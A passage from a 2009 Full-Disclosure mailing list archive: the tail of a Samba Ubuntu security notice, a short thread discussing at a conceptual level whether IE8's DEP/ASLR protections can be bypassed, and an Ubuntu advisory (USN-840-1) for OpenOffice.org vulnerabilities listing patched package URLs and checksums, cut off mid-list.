aac094d4e42580986c2056c2256209c5 http://ports.ubuntu.com/pool/main/s/samba/winbind_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 3630424 7b6143e9fa2e47c716023e3f37d92768 http://ports.ubuntu.com/pool/universe/s/samba/samba-tools_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 5398448 60faa062e6ad2f7276f61efa06bca513 http://ports.ubuntu.com/pool/universe/s/samba/swat_3.3.2-1ubuntu3.2_powerpc.deb Size/MD5: 1436246 32c9c1f616da971f6b149630da05ab30 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 600048 2552f5b27c823718c0862c5b76ca9f63 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 2213024 65ecad7035168477e207bbc5ed1d0c29 http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 1339606 cf15ae0ff3b54429d4f66917b5d406ed http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 96454 a7c4796444e2146c181a9222c7710970 http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 4080446 b1728440e3d6a92683d620f398b496c1 http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 32778340 0ca389ca9b68bf428c7e94ed23603353 http://ports.ubuntu.com/pool/main/s/samba/samba_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 4657980 997f813c1e1da2decb4c84970c72dd77 http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 8060996 ee6756467677a4fc46fab626b8be0396 http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 1512774 2ea893dd60671f3cac6c24fc42db131f http://ports.ubuntu.com/pool/main/s/samba/winbind_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 3513456 2d5d634bd732ee034f0d10239bb26944 http://ports.ubuntu.com/pool/universe/s/samba/samba-tools_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 5250174 fd91190a66a41ab02deb6741b2035559 http://ports.ubuntu.com/pool/universe/s/samba/swat_3.3.2-1ubuntu3.2_sparc.deb Size/MD5: 1395758 225e6ebcb5b001906b5014af4a40c3e3 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/48e0dc2b/attachment.bin From berendjanwever at gmail.com Thu Oct 1 20:55:37 2009 From: berendjanwever at gmail.com (Berend-Jan Wever) Date: Thu, 1 Oct 2009 21:55:37 +0200 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: References: <4AC4CA5A.80705@harris.com> Message-ID: <3fa2f5bb0910011255w380c49b6pdfd3eb1a14095e97@mail.gmail.com> FYI: ASLR & DEP can be bypassed on x86, there's just nothing public at the moment. Cheers, SkyLined Berend-Jan Wever http://skypher.com/SkyLined On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote: > Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no > DEP/ASLR there... But as you said, so far there's no known "catch-all" > technique against IE8. > Along with other security features ( > http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) > this basicly means that IE8 is the most secure web browser nowadays? > > On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote: > >> I'm not aware of any catch-all technique just for IE8, though there are >> a few common ones like return oriented programming. Application >> specific techniques are also common when third party extensions are >> involved. >> >> -- >> __________________________________________ >> Jared D. DeMott >> Principal Security Researcher >> >> > > > -- > Best wishes, > Freddie Vicious > http://twitter.com/viciousf > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/a5f3eb80/attachment.html From Valdis.Kletnieks at vt.edu Thu Oct 1 21:09:31 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 01 Oct 2009 16:09:31 -0400 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: Your message of "Thu, 01 Oct 2009 21:55:37 +0200." <3fa2f5bb0910011255w380c49b6pdfd3eb1a14095e97@mail.gmail.com> References: <4AC4CA5A.80705@harris.com> <3fa2f5bb0910011255w380c49b6pdfd3eb1a14095e97@mail.gmail.com> Message-ID: <20168.1254427771@turing-police.cc.vt.edu> On Thu, 01 Oct 2009 21:55:37 +0200, Berend-Jan Wever said: > FYI: ASLR & DEP can be bypassed on x86, there's just nothing public at the > moment. Is that "I believe it can, but there's no proof yet", or "based on non-public sources, I know for a fact it can"? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/be72925a/attachment.bin From lcamtuf at coredump.cx Thu Oct 1 21:48:26 2009 From: lcamtuf at coredump.cx (Michal Zalewski) Date: Thu, 1 Oct 2009 13:48:26 -0700 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: References: <4AC4CA5A.80705@harris.com> Message-ID: <448e9a320910011348t384f2798ua6130258640dd329@mail.gmail.com> > Along with other security features > (http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) > this basicly means that IE8 is the most secure web browser nowadays? If memory serves me right, it's been a while since we've witnessed successful, large-scale exploitation of memory corruption flaws in any browser, and it's probably not the most common exploitable security lapse these days. This is partly because many of the modern defenses - such as DEP/NX, ASLR, canaries, lower privileges / sandboxing - are becoming more prevalent across all browsers and operating systems; partly because browser seem to be doing a lot of in-house fuzzing (for MSIE, Firefox, and Chrome, this is probably pretty evident); and last but not least, in part because of the changing landscape for security disclosure: researchers are heavily incentivized to sell vulnerabilities instead (keeping the public as such generally safe, but probably greatly increasing exposure windows for targeted attacks). In the browser world, many other problems can have profound security consequences, however; browser chrome privilege escalations, zone fenceposts, even universal XSSes (made more serious by the fact more and more of our sensitive data is handled by web applications), and other design errors that allow much simpler paths of privilege escalation (sometimes including system compromise) are taking the center stage, particularly for malware distribution and other large-scale attacks. In this department, most vendors have several skeletons in the closet (Microsoft with content sniffing and zone model complexity, Firefox and some other browsers with privileged JavaScript used to implement extensions and UIs, etc). Anyhow - in the end, I would be tempted to say that the differences between browsers are much less pronounced that the media feels compelled to say; but this new fierce competition between vendors is exceptional, highly notable, and very beneficial for the industry in the long run. For example, weren't it for Firefox claims of superior security and the ensuing market adoption, we would probably not see a sudden push for security features in MSIE8; and weren't it for Microsoft's response, Mozilla folks would likely not feel compelled to keep up their in-house fuzzing efforts and security improvements in FF3 and 3.5. Then add Chrome to the mix, and it gets even more interesting... /mz PS. As for malware filtering - also, not a feature unique to any particular browser these days - I do not quite see the relevance to this discussion. Anti-malware checks improve the safety of casual browsing for general public - and hence has a positive effect for the health of the Internet as a whole - but they do not render any particular browser less likely to have exploitable vulnerabilities. From jamie at canonical.com Thu Oct 1 23:07:43 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Thu, 1 Oct 2009 17:07:43 -0500 Subject: [Full-disclosure] [USN-840-1] OpenOffice.org vulnerabilities Message-ID: <20091001220742.GA4471@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-840-1 October 01, 2009 openoffice.org vulnerabilities CVE-2009-0200, CVE-2009-0201, CVE-2009-2139 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: openoffice.org-core 1:2.4.1-1ubuntu2.2 Ubuntu 8.10: openoffice.org-core 1:2.4.1-11ubuntu2.2 Ubuntu 9.04: openoffice.org-core 1:3.0.1-9ubuntu3.1 After a standard system upgrade you need to restart OpenOffice.org to effect the necessary changes. Details follow: Dyon Balding discovered flaws in the way OpenOffice.org handled tables. If a user were tricked into opening a specially crafted Word document, a remote attacker might be able to execute arbitrary code with user privileges. (CVE-2009-0200, CVE-2009-0201) A memory overflow flaw was discovered in OpenOffice.org's handling of EMF files. If a user were tricked into opening a specially crafted document, a remote attacker might be able to execute arbitrary code with user privileges. (CVE-2009-2139) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-1ubuntu2.2.diff.gz Size/MD5: 95676554 0a1a6eb3dde1cf96ea2891d33ecc865a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-1ubuntu2.2.dsc Size/MD5: 5294 7d5ca89719582d9f5a406bd552e57de8 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1.orig.tar.gz Size/MD5: 278946187 4c601e202718781f5b6cf5f95c20974e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-common_2.4.1-1ubuntu2.2_all.deb Size/MD5: 9697162 c4c2062b392bb61a6182e7de5ba34995 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev-doc_2.4.1-1ubuntu2.2_all.deb Size/MD5: 3287408 0abe1001f09eb9265e5ac5d914cee359 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-mobiledev_2.4.1-1ubuntu2.2_all.deb Size/MD5: 94292 30dd0f9bf1bc39ecfa0b7751f0759ded http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-java-common_2.4.1-1ubuntu2.2_all.deb Size/MD5: 2610568 04bf739adc86f9757f24848e3ccd1fa7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-in_2.4.1-1ubuntu2.2_all.deb Size/MD5: 2568 20660eed5cd0091fbf94e37dbab68003 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-za_2.4.1-1ubuntu2.2_all.deb Size/MD5: 2556 b52bcd20fea92e80c64ce9cf44a4dcee http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-qa-api-tests_2.4.1-1ubuntu2.2_all.deb Size/MD5: 1289714 078cb7b1fc131c51f525e61d372ec626 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-andromeda_2.4.1-1ubuntu2.2_all.deb Size/MD5: 2768798 cd154d9dbfd6193ba24e749f16508541 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-crystal_2.4.1-1ubuntu2.2_all.deb Size/MD5: 3484234 a6bb3f21abe9574825d7256ad87e0c9b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-human_2.4.1-1ubuntu2.2_all.deb Size/MD5: 3927394 d63f91d98ed76b0cf29c1bc75eff92d6 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-industrial_2.4.1-1ubuntu2.2_all.deb Size/MD5: 3082964 cf676f7265d91c2d5da2bca387d40c4b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-tango_2.4.1-1ubuntu2.2_all.deb Size/MD5: 3098776 b73b012c4b63cc5358912f9758670e48 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ttf-opensymbol_2.4.1-1ubuntu2.2_all.deb Size/MD5: 335408 5c52afd53c50d756f13c8914cbee7895 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/broffice.org_2.4.1-1ubuntu2.2_all.deb Size/MD5: 87902 ceda99d94c883246dbc9d4c7be17136c http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-dtd-officedocument1.0_2.4.1-1ubuntu2.2_all.deb Size/MD5: 33362 dc9646fefe5caadbc03398e9ffe6bb72 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-style-hicontrast_2.4.1-1ubuntu2.2_all.deb Size/MD5: 2070990 006f0c5f849f3d61410fa1a156780a17 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libmythes-dev_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 145360 615882a696fa2c22fe116fb8ea33a6af http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 851638 ff3629f2140398b1c2c6e3619afc4915 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 1986552 7fdd961e38dd19cfd7d37c2e17d01533 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 4501114 b8a01ec447f9cc764e35c6be9a645fd1 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 28198218 ea6a0d92c71d192cd9a15dea53276b5f http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 2643226 efc1db0707ef4e1d03e8917950056061 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 2039816 9ef2d9ddcce5b3f6c4a5ddcadd722eeb http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 70766 2872c6970ca1637ed50f22757dfbb723 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 6275646 bc5a520308f869eb237e4467fa179642 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 2871490 1bdded2e338bc4813a08d37b4f889d1d http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 69052 36da98f94aca8cdcfc16599026e5dddd http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 159116 94134c1a68a8e805a98c93cb4fbbfc2c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 492120 d92c6ab64db9e5999c3992c231c98fc0 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 170710 0db6c24716a44f77f7d99202b40f2e16 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 257526 839ea21110e71c4f7debeec36f639814 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 48580 e275f310b86a8e08a744930223e4c549 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-qa-tools_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 532058 dbfeab03552307c5059958e9844aac63 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 5439258 a2260427ff3815dd9033c453a28a08fd http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 5034 94444618d449ec1e7e961c578801473c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/python-uno_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 98086 acec29ea565909fc5a4e63f7b39e77b3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 282946 518f39c05232ddcc615c4fad95834f85 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 2479158 cfd722c1d9adc5767d2390f15ff4fd23 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 383284 b3e67a866738c51b31ad37d5afa32e17 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 546236 aa0d76e270efdae7691f8e7dd86e74e2 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-report-builder_1.0.2+OOo2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 888956 ef88e4a416f4290dc6711189bf0a8b6d http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-1ubuntu2.2_amd64.deb Size/MD5: 457170 a31b3f7e334c80e8c306fee86bfd6feb i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libmythes-dev_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 146002 00545844067d669920370b4359277761 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libuno-cil_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 191958 1d6e79fd6f383c28292c9a5a3a35c685 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 809702 5be32453dce78cccb6b95eefb6a422b9 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 1897132 c2bbcbb3e4a8cc6e575a603a68c15344 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 4199652 26ae12da98bacb7b2ae6363e3ddfc0c7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 26771936 275853c4c17d45d54db682988dffefc3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 2597610 a2ae147f30f74121d070cc8f0fcaa22a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 1953802 ba2d504c8f2dab53ed2e7add1de7f98c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 66064 9d09363d12832affcd321c18a7452ec0 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 5929788 741801258841c6b4e73813e5cc6184bc http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 2210084 63a71a1480dc64ab199c9a6cf248549b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 64766 635fe1e71a295f0285caf3e5a58a097b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 148618 01de0177f4f1786b6b592f8e81edd824 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 481746 a4b48bb4ef577f5e67131fef30c62650 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 159154 5c48448cf47ff5ab1c3521d0a16daa43 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 243944 164e95d3f40210a10c000aaedc2ced08 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 48418 10fe39da23ef00794412b9713d46f573 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-qa-tools_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 523516 f0f1da654192004fd3336b3e9e6be435 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 5172628 6bd1f41ab002f964296ba47eb1831d40 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 5028 5adf92c402b6640ab59eb836c3175d62 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/python-uno_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 93534 158440adeed23d52c9732f9b6d9e3ccb http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-1ubuntu2.2_i386.deb Size/MD5: 283178 f437ae7aa10df3d05abe74b8ebc5e47e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-1ubuntu2.2_i386.deb Size/MD5: 2385528 0b90c0b7174e106ecb2b10b0396eb4f3 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 30192 23a3364dd2a9b86577872c5ecc5b12e6 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 358592 bf6d98b755c87a8b1facefaf3a86c48e http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-1ubuntu2.2_i386.deb Size/MD5: 321120 8c6ea05bdfaf25100c7e42b6eb83d520 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-1ubuntu2.2_i386.deb Size/MD5: 539044 9f22d4fe5343e634414a32f9e4a1b96b http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-report-builder_1.0.2+OOo2.4.1-1ubuntu2.2_i386.deb Size/MD5: 849790 d0e7bf9c625a7133a141f18f0c15bd6e http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-1ubuntu2.2_i386.deb Size/MD5: 423362 85d0caea094863e792716ea5a878ca6b lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 145920 35f39e738cf0b8978da17b45cf0cdd34 http://ports.ubuntu.com/pool/main/o/openoffice.org/libuno-cil_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 192422 3ea2d4ea3fe5c2ef260b606b47f29a5e http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 833278 86261c1da5ec0ff964dfc2fdbe6b60fb http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 1971110 e16d8762edecfbdff793e67c1c23494b http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 4285460 4f329d8c9a9a2183e79286ca4ea3f93e http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 27469674 a69679e1c17655b16ea139d58ba19385 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 2635104 179ed4317c0ae7c279520cac0fa7c29b http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 2009738 77beba0d86afaf4b92505ba51e3eae6f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 67232 0515a35573f2e318571682ba8d5c0058 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 6049356 882a7be3d75d53e03929ba600f53b13c http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 2429620 86b419fd19ba60ee23c2b9db834e88ac http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 66798 3a57395e794ef0373cae01fca03d5b07 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 151676 b27987f4ec10efc44e1eec1ab476eae0 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 494222 c581fe4b223e7d575c36247af5f7631e http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 162284 fc9cf7a1ef528f86666a3e272e406afd http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 249466 0cef6807c918082712e631d495925581 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 48404 41b55e20ce86eabf1c9acde47eb54824 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-qa-tools_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 529356 f405b35e22e539ef4c990220058d9fa3 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 5292384 80d714c0ce8dd47baf8f95cec5699c75 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 5026 a166e661512a80448d7bb41219345b5c http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 96202 e117cd59a8950fbdd12be6e34536efa2 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 283208 6e74f988c3d123194244eb5d739dc3a2 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 2420444 98b31f97dd565e7ef894f8514e80843c http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 30840 97e5abe4cdc278f98b70aef4df965b50 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 379568 88276bac5e123f2046539f27944a038e http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 323334 04984924c5acda4e92da65b1fa618044 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 547952 f235a95b9310e2f371122f27a594776b http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-report-builder_1.0.2+OOo2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 874614 420a8b78d0439451c9677a7ffb3513fd http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-1ubuntu2.2_lpia.deb Size/MD5: 433546 14a73da494284254276f5353eef7cad2 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 145904 98deb96b5f61b43fcae16b514c23f009 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 665938 a3452867a471118b3f9824ed61dcda92 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 1388070 e252314cb896fa1450a556fe8dc2806f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-1ubuntu2.2_powerpc.deb Size/MD5: 3406698 d21246c7bda2c3d1fb827bbb924b5e3d 